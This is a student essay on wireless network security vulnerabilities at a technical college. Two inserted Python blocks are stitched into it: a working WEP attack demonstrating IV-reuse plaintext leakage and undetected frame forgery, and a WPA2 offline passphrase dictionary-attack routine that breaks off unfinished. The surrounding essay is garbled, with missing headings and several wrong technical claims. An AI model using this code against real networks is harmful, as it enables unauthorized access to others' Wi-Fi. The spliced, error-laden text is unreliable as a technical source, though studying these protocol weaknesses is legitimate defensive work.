Investigating Wireless Network Security Vulnerabilities Computer Science Essay


This essay has been submitted by a student. This is not an example of the work written by our professional essay writers.

Not long ago, almost all government and private computer networks were limited to hard-wired connections to desktop PCs, that is, wired networks. Although many employees had laptops, they generally connected to the Internet or to a network via modems and phone lines, which are relatively easy to secure.

Today, there is explosive growth in wireless computing, both at the office and at home, and this presents completely different security problems. Wireless computing is often called Wi-Fi, which stands for Wireless Fidelity.

Wi-Fi is a technology used to connect computers and devices together. Wi-Fi gives people more mobility and flexibility by allowing users (workers) to stay connected to the Internet and to the network as they roam from one coverage area to another. This increases efficiency by allowing data to be entered and accessed on site. Like their wired counterparts, wireless LANs are prone to security vulnerabilities.


Investigating wireless network security vulnerabilities for Wireless Local Area Network in Gaborone Technical College


Investigate wireless network security vulnerabilities in a WLAN for ICT staff room.


To outline wireless network technologies.

To describe wireless network security.

To identify wireless network security vulnerabilities, effects and risks.

To find out what needs to be done to address wireless security vulnerabilities in a WLAN.


In this external project I chose to investigate wireless security vulnerabilities, because wireless LAN (Wi-Fi) technology is a growing trend that is transforming our lifestyles regardless of location. It imposes no restriction on movement and allows a great deal more freedom on the part of network users, and this exposes the network to different security vulnerabilities.

Investigating network security is challenging, hence it gives me a chance to expand my wireless LAN scope and the technical knowledge I acquired during my studies.

The project will be beneficial to me and others:

It will improve my wireless networking skills.

It will improve my problem-solving and communication skills, because it includes research and interpersonal communication.

It will benefit others as reference material in the school learning resource centre.

To accomplish this project I will have to apply and develop further the following learnt key skills and vocational units.

Information and Communications Technology 3: with the skills I have gained from this unit I will surf the internet as I do the research and find the information I need. It will also help me to format my document accordingly.

Wireless Networking: with the skills I acquired from this unit I will be able to investigate WLAN security vulnerabilities.

Communications: the skills acquired from this unit will help me to interact and communicate with the administrator, discuss the security vulnerabilities (strengths and weaknesses) of the G.T.C WLAN, and give her a questionnaire to answer.

Personal and Interpersonal Skills (PIPS): this is where I learnt to interact with people and how to draw up an action plan, devise a strategy to achieve goals for the development of personal and interpersonal skills, make the necessary adjustments and review progress.

Network Server Operating System: with the skills I have learnt from this unit I will be able to determine the vulnerabilities (strengths and weaknesses) of the WLAN in Gaborone Technical College.

Problem Solving: in this unit I learnt how to identify a problem, evaluate it and come up with a solution.


In order to carry out this investigation in a proper manner I found it wise to come up with an action plan to guide me through the whole investigation. The action plan is very important as it gives time frames for activities, and through it I will know when to start and finish each task.







Task | Resources | Time
Brainstorming the project title and coming up with the aims, objectives and justification of the project | Computer, A4 papers, Pen, Internet, Books | 2 hours 30 minutes
Preparing the action plan | Computer, Printer, A4 papers, Pen, Books | 4 hours
Reading and comparing methods of collecting data; choosing the questionnaire and survey to be used | Computer, Printer, A4 papers, Pen, Internet | 2 hours
The old and emerging IEEE wireless LAN standards, data speeds and frequencies | Computer, A4 papers, Pen, Internet, Books | 2 hours
How the WLAN standards are established | Computer, Printer, A4 papers, Books | 2 hours
The pros and cons of the different data speeds and frequencies used in wireless networks | Computer, Printer, A4 papers, Pen, Books | 2 hours
How logical and physical network architecture differ | Computer, Printer, A4 papers, Books, Internet | 1 hour 30 minutes
How spectrum and radio frequency work in wireless networks | Computer, Printer, Books, Internet | 2 hours
Different security protocols | Computer, Printer, A4 papers, Pen, Books, Internet | 1 hour 30 minutes
The resolutions of security protocols | Computer, Printer, A4 papers, Pen, Books, Reference | 1 hour
Purposes of security protocols | Computer, A4 papers, Pen, Internet | 2 hours
What access control is and how it is determined in a WLAN | Computer, Printer, A4 papers, Pen, Books | 2 hours
What authentication protocols are | Computer, Printer, A4 papers, Pen, Books | 1 hour 30 minutes
Types of wireless security threats | Computer, Printer, A4 papers, Pen, Internet | 2 hours
How attacks are carried out and the tools used | Computer, Printer, A4 papers, Pen, Reference Materials | 2 hours
How to identify and prevent wireless security threats and attacks | Computer, A4 papers, Pen, Books | 3 hours
The effects of security vulnerabilities in terms of data loss, corruption and improper use | Computer, A4 papers, Pen, Books | 2 hours
How to implement control measures in wireless networks | Computer, Printer, A4 papers, Books | 2 hours
Compilation of the collected information | Computer, Printer, A4 papers, Pen, Books, Internet | 6 hours
The old and emerging IEEE wireless LAN standards, data speeds and frequencies in the GTC WLAN | A4 papers, Pen, Books, Reference Materials | 3 hours
The pros and cons of the different data speeds and frequencies used in the GTC WLAN | A4 papers, Pen, Books, Reference Materials, Internet | 3 hours
The logical and physical network architecture of the GTC WLAN | A4 papers, Pen, Books, Reference Materials, Internet | 3 hours
The different security protocols used in the GTC WLAN | A4 papers, Pen, Reference Materials, Books | 1 hour
The effects of security vulnerabilities in the GTC WLAN in terms of data loss, corruption and improper use | A4 papers, Pen, Books, Reference Materials | 3 hours
Evaluating the existing wireless security policies of GTC against the latest security standards | Computer, A4 papers, Pen, Internet | 2 hours
Drawing the conclusion of the project | A4 papers, Pen, Internet, Books | 2 hours
Assessing whether all the processes of the project have been tackled | Computer, Printer, A4 papers, Pen, Reference Materials | 5 hours
(task not recorded) | Computer, Printer, A4 papers, Pen | 4 hours
Writing an evaluation of the report | Computer, Printer, A4 papers, Pen | 2 hours
Submission of the project | Computer, Printer, A4 papers, Pen | 10 minutes
















There are two types of data collection method: primary research and secondary research. Primary research is the process of collecting information on a subject through first-hand observation and investigation. Secondary research involves examining the studies of other researchers; the researcher accesses information that has already been gathered by the distributor of the primary research. Information is collected through various methods, such as the following:

Academic journals

Documentation review


The Internet is a network of interlinked computer networks worldwide that is accessible to the general public.

Advantages:

It reduces the need for many books and a lot of paperwork, so information is faster to access and more information is available at any given time.

It is a fast and reliable method of data collection.

Disadvantages:

Information from the internet can be confusing; specific searches often turn out to be unproductive, and some information may not be true.

It increases exposure to cybercrime, as information posted on some websites is not supervised; wrong information can be posted and the researcher may accept it believing it to be correct.

The internet is inaccessible to certain users, as it can only be used by literate individuals.


An interview is a conversation in which one person (the interviewer) elicits information from another person (the interviewee).

Advantages:

You get the full range and depth of information you want from the interviewee.

You are able to ask for more detail when needed, because you talk face to face or over the phone; this helps the researcher to frame follow-up questions based on the research topic, so more information is gathered for the research.

Disadvantages:

It can take much time waiting for the interviewee.

It can be hard to analyse and compare the information you gather from interviewees.

It can be costly when the interviewee is outside your vocational area.


The questionnaire (also called a survey) is a set of questions given to a sample of

Advantages:

It is inexpensive to administer and a lot of data can be obtained.

It is easy to compare and analyse, and it can be administered to many people.

Disadvantages:

You might not get careful feedback from the respondent, so the evaluator does not get full answers.

The respondent can lose the questionnaire.


Books: this means using information that others have written to get an idea of what they have done on the same topic.

Advantages:

It is easy and cheap to research from books.

They are easily accessible from libraries.

Disadvantages:

You might not find the information you are looking for.

You might take a long time looking for the information.


Document review is a formalized technique of data collection involving the examination of existing records or documents.

Advantages:

Information contained in existing documents is independently confirmable.

Document review is typically less expensive than collecting the data yourself.

Disadvantages:

Information in the documents may represent a perspective that is not aligned with the needs of the assessment project.

Data in the document sources may not be exactly what is needed for the assessment.

Obtaining and analysing the necessary documents can be a time-consuming process.


Observation is defined as the visual study of something in order to gain information.

Advantages:

The main strength of observation is that it provides direct access to the social phenomena under consideration. Instead of relying on some kind of self-report, such as asking people what they would do in a certain situation, you actually observe and record their behaviour in that situation [1].

Diversity, Flexibility and Applicability

Observation can take diverse forms, from informal and unstructured approaches through to tightly structured, standardised procedures, and can yield associated diverse types of data, both qualitative and quantitative. Observation, therefore, is applicable in a wide range of contexts [1].


Disadvantages:

It can influence the behaviour of program participants.

It can be expensive.

It can be difficult to interpret observed behaviour.


One of the main disadvantages of observation is that it can be very time consuming and resource intensive. Observation may be a very desirable strategy to explore certain research questions, but it may simply not be feasible for the researcher with limited time and resources to carry out the observation and, therefore, alternative strategies would have to be pursued [1].


An academic journal is a peer-reviewed periodical in which scholarship relating to a particular academic discipline is published.

Advantages:

They are permanent.

They are easily distributed (many copies are stored in different places).

Disadvantages:

The refereeing system is not perfect.

They are difficult to search.


To complete this project I will gather information on wireless network security vulnerabilities in the GTC WLAN using different research methods, namely a questionnaire, an interview, and research from books and the internet, in order to meet the aims and objectives. I chose books and the internet because it will be easy to find the information I want: I can borrow books and use the internet in the library to research my project. I chose the interview and questionnaire because they make it easy to get the answers I expect from the interviewee.



A literature review is a survey and discussion of the works in a given area of study. It is a brief overview of what has been studied, argued and established about a topic, and it is usually organized chronologically or thematically. It is not a summary; rather, it evaluates previous and current research in regard to how relevant and/or useful it is and how it relates to your own research [2].


Wireless is a term used to describe telecommunications in which electromagnetic waves (rather than some form of wire) carry the signal over part or the entire communication path.

Wireless networks are more flexible than wired ones, but they can also be more vulnerable to hackers or to malicious software such as worms. Because wireless networks use radio waves (RF) that can pass through walls, your network's signal can extend beyond the boundaries of your home.

If there is no security on the network, people with computers nearby might be able to access the information stored on your network computers and use your Internet connection to get onto the web. By setting up a security key (WEP) on your wireless network, you can help protect it from unauthorized access.

Technology is the branch of knowledge that deals with the creation and use of technical means and their interrelation with life, society and the environment, drawing upon such subjects as engineering.


It is important to have an understanding of what a wireless LAN is; this helps give an insight into how it works. There are three primary categories of organizations that guide the wireless industry: regulation, standardization and compatibility.

The Federal Communications Commission (FCC) and the European Telecommunications Standards Institute (ETSI) are examples of regulatory bodies. The Institute of Electrical and Electronics Engineers (IEEE) is an example of a standards development organization, and the Wi-Fi Alliance is a compatibility testing and certification group.

Compared to a wired LAN, Wi-Fi simply replaces cables with small, low-powered two-way radios. Instead of altering the voltage on a wire, it encodes the zeros and ones by laying an alternating radio signal over a constant existing signal at a prearranged speed. The alternating signal encodes zeros and ones on the radio waves.

In a wireless topology, computers connect to each other using radio frequencies. Wireless technology enables connections between two or more devices without cables for data-sharing purposes. Wireless networking is based on the IEEE 802.11 standards. It is used by millions of people on various devices such as personal computers, laptops, PDAs, printers, cameras, iMacs, games consoles and MP3 players (iPods).

Why use wireless technology?

Wireless LANs are in rapid demand and are improving users' lifestyles at both personal and business level; users have been quick to adopt this technology based on the following factors:

Simplified implementation and maintenance

Wireless access points can be placed in the ceiling, or wherever the RF signal strength will not be reduced (attenuated), where they can accommodate an almost endless variety of office and home configurations, as in the image shown below:

Fig 1.0 showing AP on the Ceiling

This access point supports Wi-Fi connections to company resources from any worker in range.

Extended Reach

Wireless LANs enable users (employees) to access company resources from any location within an Access Point's transmission range. This flexibility and convenience can directly improve users' productivity.


Fig 1.1 showing extended WLAN [3]

Increased worker mobility

The roaming benefits of wireless LANs extend across all industries and disciplines. Roaming makes the management of business logistics and personal matters easier through the use of various devices in different places, ranging from homes, warehouses and airport lounges to coffee shops.

Fig 1.2 showing Free Wi-Fi/Zone [4]

Free Wi-Fi zones (hotspots) are mostly found in suitable public areas like airport lounges, national libraries and coffee shops, where the image shown above is displayed.

Reduced total cost of ownership and operation

The cumulative benefits of simplified implementation and maintenance, an extended Local Area Network reach, and the freedom to roam minimize expenses and improve organizational and employee productivity. The result is reduced total cost of ownership and operation.


Wireless Personal Area Network (WPAN)

It is a wireless network for interconnecting devices around an individual's workplace. The technology used in a WPAN is energy efficient; for example, communication can occur between a laptop computer and a cellphone using a wireless technology such as Bluetooth or infrared.

Advantages of Wireless Personal Area Network

Dynamic network setup: you can move your workplace to another place and set up the network again.

Usually quick and relatively simple to set up, because the devices interconnect around an individual workstation.

Disadvantages of Wireless Personal Area Network

WPANs are currently limited to comparatively slow data rates compared with WLAN technologies.

Compatibility and interoperability issues; WPAN technologies are not typically compatible with each other. Some WPAN technologies such as Bluetooth are known to have had interoperability issues between devices from different producers [5].

Wireless Local Area Network (WLAN)

It is a local area network that uses radio waves rather than wires to connect the nodes on a network. An example of a wireless local area network might include two different buildings on the same site connected by some wireless distribution method, typically spread-spectrum or Orthogonal Frequency Division Multiplexing radio, e.g. Wi-Fi. The advantage of the wireless local area network is that you can connect to the network from any point within its coverage area.

Advantages of Wireless Local Area Network

Cheaper and quicker deployment

It does not include making physical connections.

Increasing productivity

Research results show that wireless technologies have a direct impact on productivity [5].

Mobility and Availability

You do not have to worry about cable length or finding a socket because it is wireless; you can take your laptop wherever you go, the living room for example, but consider the coverage of the access point [5].

Disadvantages of Wireless Local Area Network

Limited number of users and lower bandwidth

Wireless transmission is less reliable compared to wired networks.

Less security

Wireless is more vulnerable to malicious attacks so you need to use more security.

Wireless Wide Area Network (WWAN)

It provides wireless connectivity to the internet, achieved through cellular tower technology. For example, laptop users use a wireless wide area network to connect to the internet. The main advantage of the wireless wide area network is that it works by multiplexing. Wireless wide area networks vary with the devices used. Using satellite internet access, a WWAN can cover more area than any other type of network.

Advantages of Wireless Wide Area Network

In a WWAN a message can be sent very quickly to anyone else on the network [3].

A printer can be used by more than one computer.

Disadvantages of Wireless Wide Area Network

Token-ring constraint

If a lower tier goes down, all higher tiers go down.

Bandwidth efficiency is reduced with each tier [4].


There are two main topologies in wireless networks which can be configured: Peer-to-peer which is also known as ad hoc mode and Client/Server which is also known as infrastructure networking.

In an ad hoc wireless network, two or more computers communicate directly with each other without using a central device [5]. There is no central device (hub), and these networks can be created almost anywhere and almost spontaneously.

[5] defines an infrastructure network as one in which a central wireless device, known as the access point, is used to authenticate and configure the wireless clients that fall within its range. A special identifier known as the Service Set Identifier must be configured on the AP and on each wireless client. The AP can further be connected to the wired LAN so that wireless clients can access the wired LAN as well.


Ad hoc mode allows stations to communicate with each other without the use of an access point; the stations connect together wirelessly. Ad hoc mode can be used between stand-alone computers that connect through Bluetooth technology.


Fig 1.3 An Ad-hoc wireless network [6]


Ad hoc mode is cheaper because it does not need a router; the stations use radio frequency signals between themselves instead of an access point.

Ad hoc mode can be useful as a temporary backup option if an infrastructure-mode network's access points are malfunctioning [9].


Ad hoc mode connections are limited, for example between two laptops, by the power available in the laptops [10].


Infrastructure mode involves the use of an access point. All wireless traffic traverses the access point; there is no direct communication between stations, each connects to the access point. The stations are grouped in this way into a basic service set or an extended service set.

Figure 1.4 an infrastructure wireless network [7]


If we compare ad hoc with infrastructure mode, infrastructure mode provides much more stability, scalability, ease of management and improved security [9].

Infrastructure mode is much better than ad hoc mode for sharing data between three or more computers, because each computer needs only one network connection (three connections for three units) instead of one connection for each pair of workstations.


Infrastructure mode is expensive because it needs a router or switch.

These two topologies can also be divided into two other classes, namely office and public networks. An office network is meant to serve only authorized users, whereas a public network is open to all. Public networks are nowadays increasingly set up in locations where people find it convenient to send or receive e-mail, link to their office network, or simply surf the Internet, for example airport waiting areas, hotels, coffee shops, pubs and national libraries.



Eavesdropping is a passive attack in which an attacker monitors network transmissions and evaluates packets for specific message content. Eavesdropping allows the attacker to keep his distance from the facility, leave no trace of his presence, and listen to and gather valuable information with a directional antenna.


It is an active attack in which an attacker gains access to a server to obtain valuable data, or uses the organization's Internet access for malicious purposes. The process can be detected but cannot be prevented. The attacker gains access to the server wirelessly.


Jamming is a technique used simply to break down or shut down communications on a network. When a hacker jams a network, they use wireless LAN equipment with a high-power RF signal generator or sweep generator that cuts off the clients' connections to the WAP.

Man in the middle

This is where a hacker uses a much higher-power access point to attract the nodes of another access point. The users will continue to send important data to the rogue access point, possibly sensitive or important data, not knowing that the access point has changed.

War driving

This is when a user searches for networks from a vehicle using a computer, which can be a laptop or PDA, a wireless Ethernet card set to work in promiscuous mode and an antenna that can be mounted on top of or positioned inside the car. Hackers can access the network when security is not enabled on the access point.


IEEE 802.11, also referred to as Wireless Fidelity (Wi-Fi), is the standard for providing local area network (LAN) communications using radio frequencies (RF). [10] defines the 802.11 standards as a number of different physical layer (PHY) technologies to be used with the 802.11 MAC. Understanding these different standards helps give insight into how IEEE 802.11 functions, and how and why the standards have evolved the way they have. [10] examines each of these 802.11 PHYs, including the following:

802.11 Standard/Variant | Data Speed | Frequency | Transmission Type
802.11 (original) | Up to 2 Mbps | 2.4 GHz | Frequency hopping PHY (FHSS) or Direct Sequence PHY (DSSS)
802.11a | Up to 54 Mbps | 5 GHz UNII band | Orthogonal Frequency Division Multiplexing (OFDM) PHY
802.11b | Up to 11 Mbps | 2.4 GHz ISM band | DSSS with CCK as well as FHSS
802.11g | Up to 54 Mbps | 2.4 GHz ISM band | Extended Rate Physical (ERP) layer: OFDM PHY above 20 Mbps, DSSS with CCK below 20 Mbps
Bluetooth (IEEE 802.15.1) | Up to 2 Mbps | 2.5 GHz ISM band | Scatternet

New emerging wireless standards

New standards are established to keep up with high speed demand, and advanced security measures. Some of the recent variants are listed below but are not limited here:

802.16 WiMAX







The fundamental concept of spread spectrum radio is the use of a wider frequency bandwidth than the transmitted information needs. This extra bandwidth is really important in wireless because it brings some good benefits, which include reduced vulnerability to jamming, less vulnerability to interference, and coexistence with narrowband transmissions.

According to [9], three physical layers were standardized in the initial revision of 802.11, which was published in 1997:

Frequency-hopping (FH) spread-spectrum radio PHY (FHSS)

Infrared light (IR) PHY (not much used or implemented recently)

Direct-sequence (DS) spread-spectrum radio PHY (DSSS)

According to [9], in 1999 two further physical layers based on radio technology were developed:

802.11a: Orthogonal Frequency Division Multiplexing (OFDM) PHY

802.11b: High-Rate Direct Sequence (HR/DS or HR/DSSS) PHY


Figure 1.5 An illustration of three physical layers of radio technology [12]

Frequency Hopping Spread Spectrum

FHSS is a method of transferring radio signals by rapidly switching a carrier among many frequency channels, jumping from one frequency to another in a pseudo-random pattern and transmitting a short burst on each sub-channel. Frequency Hopping Spread Spectrum was used in the original 802.11 standard and provides 1 and 2 Mbps RF communications in the 2.4 GHz ISM band for clause 14 radios [17]. For frequency-hopping wireless LANs, the usable portion of the 2.4 GHz ISM band is 83.5 MHz. Frequency-hopping systems are the cheapest to make: specific timing is needed to control the frequency hops, but sophisticated signal processing is not required to extract the bit stream from the radio signal.

Direct-Sequence Spread Spectrum (DS/DSSS)

Direct-Sequence Spread Spectrum is another physical layer in the 802.11 specifications. Direct-sequence systems spread the power out over a wider frequency band using mathematical coding functions. Two direct-sequence layers were specified: the initial specification in clause 15 standardized a 2 Mbps PHY, and 802.11b added clause 18 for the HR/DSSS PHY. Direct-sequence systems require more sophisticated signal processing, which translates into more specialized hardware and higher electrical power consumption. Direct-sequence techniques also allow a higher data rate than frequency-hopping systems.

Orthogonal Frequency Division Multiplexing (OFDM)

Orthogonal Frequency Division Multiplexing (OFDM) divides an available channel into several sub-channels and encodes a portion of the signal across each sub-channel in parallel. Clause 17, added with 802.11a, specifies the OFDM PHY.

Note: FHSS and DSSS are not modulation techniques, but methods of distributing a radio signal across bandwidth.


Network architecture describes the protocols, major hardware, and software elements that constitute the network. Network architecture, whether wireless or wired, may be viewed in two ways, logically and physically.

Network Logical Architecture

The logical architecture of a network refers to the structure of standards and protocols that enable connections to be established between physical devices, or nodes, and which control the routing and flow of data between these nodes.

The logical architecture of wireless networks is mostly described with reference to the OSI model. Standard logical architecture is the 7-layer Open System Interconnection (OSI) Reference Model, developed by the International Standards Organization (ISO). OSI specifies a complete set of network functions, grouped into layers.

Figure 1.6 showing the OSI Model [17]

Figure 1.7 showing a table of summary of the OSI model



Layer | Description | Standards and protocols
7. Application Layer | Standards that define the provision of services to applications, such as checking resource availability and authenticating users. |
6. Presentation Layer | Standards to control the translation of incoming and outgoing data from one presentation format to another. It deals with compression and decompression, and with the encryption and decryption techniques used to protect data against malicious attacks. |
5. Session Layer | Provides the control structure for communication between applications; establishes, manages and terminates connections (sessions) between cooperating applications. |
4. Transport Layer | Provides reliable, transparent transfer of data between end points; provides end-to-end error recovery and flow control. |
3. Network Layer | Standards to define the management of network connections: routing, relaying and terminating connections between nodes in the network. | IPv4, IPv6, ARP
2. Data Link Layer | Provides for the reliable transfer of information across the physical link; sends blocks (frames) with the necessary synchronization, error control and flow control. | ARP, Ethernet, Wi-Fi, Bluetooth
1. Physical Layer | Concerned with the transmission of an unstructured bit stream over the physical medium; deals with its mechanical, electrical, functional and procedural characteristics. | Ethernet, Wi-Fi, Bluetooth, WiMAX

Wireless Network Physical Architecture

The physical components of a wireless network implement the Physical, Data Link, and Network Layer functions. The physical layer is divided into two sub layers: the Physical Layer Convergence Procedure (PLCP) sub layer and the Physical Medium Dependent (PMD) sub layer.

The Physical Layer Convergence Procedure (PLCP) is the glue between the frames of the MAC and the radio transmissions in the air.

The Physical Medium Dependent (PMD) defines the characteristics of, and method of transmitting and receiving, user data through a wireless medium between two or more stations.

The physical layer also incorporates a clear channel assessment (CCA) function to indicate to the MAC when a signal is detected.


Figure 1.8 showing Diagram of Physical Architecture


If you plan to have a wireless network, you should set it up so that only people you choose can access it. Here are a few options for wireless network security, though the list is not exhaustive:

As wireless networks have become important to doing business, security has become an increasingly major concern. Computer security is a rapidly evolving field, in the sense that every new technology is a target for hackers, crackers, spyware, Trojans, worms and malicious viruses. Security standards and protocols have also evolved to address these security issues, dating back to the inception of 802.11; they include Wired Equivalent Privacy, Wi-Fi Protected Access, WPA2 (802.1x), wireless gateways, AES, key hopping and 802.11i.

Wired Equivalent Privacy (WEP) Encryption Vulnerabilities

Wired Equivalent Privacy (WEP) is the wireless security protocol intended to provide authentication, confidentiality and data integrity in 802.11 networks. It is the oldest of the 802.11 security protocols and has been discredited so thoroughly that its authentication and encryption are not considered sufficient for enterprise networks. [10] shows that WEP is based on the RC4 stream cipher, which combines the secret user key with a system-generated initialization vector (IV): the Key Scheduling Algorithm (KSA) sets up the cipher state from the IV and key, and the Pseudo-Random Generation Algorithm (PRGA) produces the keystream that is XORed with the data. The original implementations of WEP supported so-called 40-bit encryption, with a 40-bit secret key and 24 additional bits of system-generated IV (64 bits total) [10]. The WEP key is meant to stop intruders from reading the traffic exchanged between the AP and its clients.

Figure 1.9 showing Wired Equivalent Privacy process [13]

When communicating, wireless network equipment uses the WEP key to encrypt the data stream. The key itself is not sent over the network; it is generally stored on the wireless adapter or in the Windows Registry, while the IV is sent in the clear in front of every frame.
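The following added example (not code from the essay) builds WEP's encapsulation from the pieces named above, RC4 seeded with IV || key and a CRC-32 integrity check value (ICV), and then shows two of the reasons it was discredited: when the 24-bit IV repeats, the keystream repeats and XORing two frames exposes the XOR of their plaintexts; and because CRC-32 is linear, an attacker can flip chosen plaintext bits and patch the ICV without knowing the key. The key, IV and frame contents are constructed for the example.

```python
"""Toy WEP encapsulation (RC4 + CRC-32 ICV) showing two weaknesses that
discredited WEP: keystream reuse from the 24-bit IV, and the linear ICV.
Added example, not code from the essay; key, IV and frames are constructed."""
import struct
import zlib

def rc4_ksa(key: bytes) -> list:
    """Key Scheduling Algorithm: build the RC4 permutation S from the seed key."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    return S

def rc4_keystream(key: bytes, n: int) -> bytes:
    """Pseudo-Random Generation Algorithm: n keystream bytes from the KSA state."""
    S = rc4_ksa(key)
    i = j = 0
    out = bytearray()
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)

def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def icv(data: bytes) -> bytes:
    """WEP Integrity Check Value: plain CRC-32, little-endian, no key involved."""
    return struct.pack("<I", zlib.crc32(data) & 0xFFFFFFFF)

def wep_encrypt(wep_key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """IV (24 bits, sent in clear) || RC4_{IV || key}(plaintext || ICV).
    A 40-bit key gives the '64-bit WEP' of the text: 24 + 40 = 64 bits of seed."""
    assert len(iv) == 3 and len(wep_key) in (5, 13)
    keystream = rc4_keystream(iv + wep_key, len(plaintext) + 4)
    return iv + xor(plaintext + icv(plaintext), keystream)

def wep_decrypt(wep_key: bytes, frame: bytes):
    """Receiver side: returns (plaintext, icv_ok); a frame with a bad ICV is dropped."""
    iv, body = frame[:3], frame[3:]
    data = xor(body, rc4_keystream(iv + wep_key, len(body)))
    plaintext, tag = data[:-4], data[-4:]
    return plaintext, tag == icv(plaintext)

def leak_from_iv_reuse(frame1: bytes, frame2: bytes) -> bytes:
    """Same IV + same key = same keystream.  XOR of the two ciphertexts cancels the
    keystream and exposes plaintext1 XOR plaintext2, no key needed.  With only 2^24
    IVs a busy AP repeats one within a day; the birthday bound is about 4096 frames."""
    assert frame1[:3] == frame2[:3], "IVs differ: keystreams are independent"
    n = min(len(frame1), len(frame2)) - 3 - 4        # strip IV prefix and ICV suffix
    return xor(frame1[3:3 + n], frame2[3:3 + n])

def flip_bits_undetected(frame: bytes, delta: bytes) -> bytes:
    """Turn the plaintext into plaintext XOR delta and keep the ICV valid, without
    the key: crc(a ^ b) == crc(a) ^ crc(b) ^ crc(zeros of the same length)."""
    iv, body = frame[:3], frame[3:]
    assert len(delta) == len(body) - 4
    icv_delta = xor(icv(delta), icv(bytes(len(delta))))
    return iv + xor(body, delta + icv_delta)

def demo():
    key = bytes.fromhex("0102030405")                  # constructed 40-bit key
    iv = b"\x00\x00\x2a"
    p1 = b"GET /index.html HTTP/1.0"                   # constructed frames
    p2 = b"GET /staff/pay.xls HTTP/1"
    f1, f2 = wep_encrypt(key, iv, p1), wep_encrypt(key, iv, p2)   # IV reused
    leaked = leak_from_iv_reuse(f1, f2)
    target = b"GET /admin.html HTTP/1.0"
    forged = flip_bits_undetected(f1, xor(p1, target))
    forged_pt, forged_ok = wep_decrypt(key, forged)
    return {
        "roundtrip_ok": wep_decrypt(key, f1) == (p1, True),
        "leak_is_p1_xor_p2": leaked == xor(p1, p2)[:len(leaked)],
        "forged_plaintext": forged_pt,
        "forged_icv_ok": forged_ok,
    }

if __name__ == "__main__":
    print(demo())
```

The receiver in this example accepts the forged frame because the ICV check only detects accidental corruption; a keyed message integrity code, as introduced by TKIP's Michael and CCMP, is what stops the bit-flipping shown here.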

Wi-Fi Protected Access (WPA)

Wi-Fi Protected Access (WPA) is technically a Wi-Fi Alliance certification, not a security standard. It includes a single security protocol, the Temporal Key Integrity Protocol (TKIP), and the two names are often confused. WPA is essentially a pre-standard subset of 802.11i that includes the key management and the authentication architecture (802.1X) specified in 802.11i.

TKIP provides important data encryption enhancements over WEP, including a per-packet key mixing function, a Message Integrity Check (MIC) named Michael, an extended initialization vector (IV) with sequencing rules, and a re-keying mechanism. Through these enhancements TKIP addressed all of WEP's vulnerabilities that were known at the time.

It was designed to fix WEP's vulnerabilities while operating within the constraints of existing 802.11 equipment such as access points and WLAN network interface cards, that is, to improve the security of 802.11 networks without requiring a hardware upgrade. Like any other security standard it has flaws of its own, and it was later shown to be vulnerable to a packet-injection attack.


Figure 2.0 WPA encryption and integrity check process [14]

Wi-Fi Protected Access 2 (802.1X)

WPA2 is, technically, a certification rather than a security standard. It covers two security protocols, TKIP and CCMP, the AES-based protocol defined in 802.11i. The 802.1X standard is designed to enhance the security of wireless local area networks (WLANs): it provides an authentication framework that allows a user to be authenticated by a central authority, and uses an existing protocol, the Extensible Authentication Protocol (EAP, originally RFC 2284, since replaced by RFC 3748), for the message exchange during the authentication process.

Figure 2.1 showing Wi-Fi protected Access 2(802.1x) process [15]

WPA2 can be enabled in two modes, WPA2-Personal and WPA2-Enterprise. WPA2-Personal protects against unauthorized network access with a pre-shared passphrase configured on the access point and on every client. WPA2-Enterprise verifies each network user through an authentication server using 802.1X and EAP. WPA2 is backward compatible with WPA.
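As an added example (not code from the essay), the block below derives the WPA2-Personal pairwise master key from the passphrase and SSID exactly as 802.11i specifies (PBKDF2-HMAC-SHA1, 4096 iterations, 32 bytes), expands it into the pairwise transient key of the 4-way handshake, and then shows the practical consequence for a passphrase-protected network: every value except the passphrase travels over the air, so whoever captures a handshake can test candidate passphrases offline. The SSID, passphrase, MAC addresses, nonces and EAPOL frame are constructed, not a real capture.

```python
"""WPA2-Personal key derivation and the 4-way handshake's pairwise key expansion,
used to show why the passphrase is the weak point.  Added example, not code from
the essay.  PSK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096, 32) and PRF-512 follow
IEEE 802.11i; the network name, passphrase, MACs, nonces and frame are constructed."""
import hashlib
import hmac

def wpa2_psk(passphrase: str, ssid: str) -> bytes:
    """Pairwise Master Key for WPA2-Personal.  The SSID is the salt, so the same
    passphrase gives a different PMK on every network, but nothing else varies."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)

def pairwise_transient_key(pmk, aa, spa, anonce, snonce) -> bytes:
    """PRF-512 of the 4-way handshake: PTK = KCK(16) || KEK(16) || TK(16) || ...
    aa/spa are the AP and station MAC addresses, anonce/snonce the handshake nonces."""
    data = (b"Pairwise key expansion\x00"
            + min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce))
    out = b"".join(hmac.new(pmk, data + bytes([i]), hashlib.sha1).digest() for i in range(4))
    return out[:64]

def eapol_key_mic(kck: bytes, eapol_frame_mic_zeroed: bytes) -> bytes:
    """Key MIC of a handshake message: HMAC-SHA1 truncated to 128 bits for CCMP
    (key descriptor version 2), computed over the frame with its MIC field zeroed."""
    return hmac.new(kck, eapol_frame_mic_zeroed, hashlib.sha1).digest()[:16]

def offline_dictionary_attack(ssid, aa, spa, anonce, snonce, eapol_zeroed, captured_mic, wordlist):
    """Everything except the passphrase is in a captured handshake, so an attacker
    tries candidates offline until the recomputed MIC matches.  The cost per candidate
    is one 4096-round PBKDF2, i.e. passphrase entropy is all that protects the PMK."""
    for candidate in wordlist:
        kck = pairwise_transient_key(wpa2_psk(candidate, ssid), aa, spa, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_key_mic(kck, eapol_zeroed), captured_mic):
            return candidate
    return None

def demo():
    ssid, passphrase = "GTC-ICT-Staff", "summer2010"          # constructed network
    aa = bytes.fromhex("001122334455")                        # AP MAC (constructed)
    spa = bytes.fromhex("66778899aabb")                       # station MAC (constructed)
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))   # fixed for repeatability
    # Constructed stand-in for handshake message 2 with its MIC field zeroed.
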